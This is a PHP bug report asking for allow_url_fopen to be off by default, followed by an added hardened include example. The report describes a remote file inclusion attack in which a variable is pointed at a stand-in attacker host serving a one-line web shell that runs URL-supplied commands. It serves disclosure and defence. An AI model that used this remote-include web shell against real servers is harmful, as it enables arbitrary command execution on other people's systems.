From: [EMAIL PROTECTED]
Operating system: ALL
PHP version: 4.3.0RC3
PHP Bug Type: Unknown/Other Function
Bug description: allow_url_fopen is on by default.

PHP by default allows include() calls which contain URL/URI strings.

    register_globals=on

    include($somevar . "/file.php"); // real site code

Exploit by overriding $somevar to http://badsite.evilcode.com where file.php is

    <?php system($cmd); ?>

This causes the "real site" to execute the $cmd command passed in on the URL/URI string.

Requesting that allow_url_fopen be set to "Off" for future releases and a documentation note made about the caveat.

-Mike

--
Edit bug report at http://bugs.php.net/?id=21085&edit=1
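An added example, not part of the bug report: the pattern Mike describes next to a hardened form that reads the parameter explicitly, maps it through a fixed allow-list and resolves it under a fixed directory, so that neither register_globals nor allow_url_fopen can turn a request parameter into a remote include. The page names, directory layout and the ?page= parameter are assumptions.

```php
<?php
// Added example, not from the original bug report.
// Vulnerable pattern from the report: with register_globals=On, $somevar is
// filled straight from the request; with allow_url_fopen=On, include() then
// fetches "http://<remote host>/file.php" and executes it on this server.
function vulnerable_include()
{
    global $somevar;                 // e.g. populated from ?somevar=...
    include($somevar . "/file.php");
}

// Hardened form: the include path is never built from user input.
// php.ini hardening that belongs alongside this code:
//   register_globals = Off
//   allow_url_fopen  = Off
define('PAGE_BASE', dirname(__FILE__) . '/pages');   // assumed layout
$allowed_pages = array(                              // assumed page names
    'home'    => 'home.php',
    'contact' => 'contact.php',
);

// Returns true when a known page was included, false when refused.
function safe_include($page, $allowed, $base)
{
    if (!isset($allowed[$page])) {
        return false;                // not on the allow-list: refuse
    }
    $root   = realpath($base);
    $target = realpath($base . '/' . $allowed[$page]);
    // Defence in depth: the resolved file must still sit under $base,
    // even though the allow-list already rules out "../" and URLs.
    if ($root === false || $target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;
    }
    include $target;
    return true;
}

// Read the parameter explicitly instead of relying on register_globals.
$page = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!safe_include($page, $allowed_pages, PAGE_BASE)) {
    header('HTTP/1.0 404 Not Found');
    echo 'Unknown page';
}
```

Later PHP releases (5.2 onward) split this behaviour into a separate allow_url_include directive, which is off by default; the allow-list approach above is still the right control regardless of those settings.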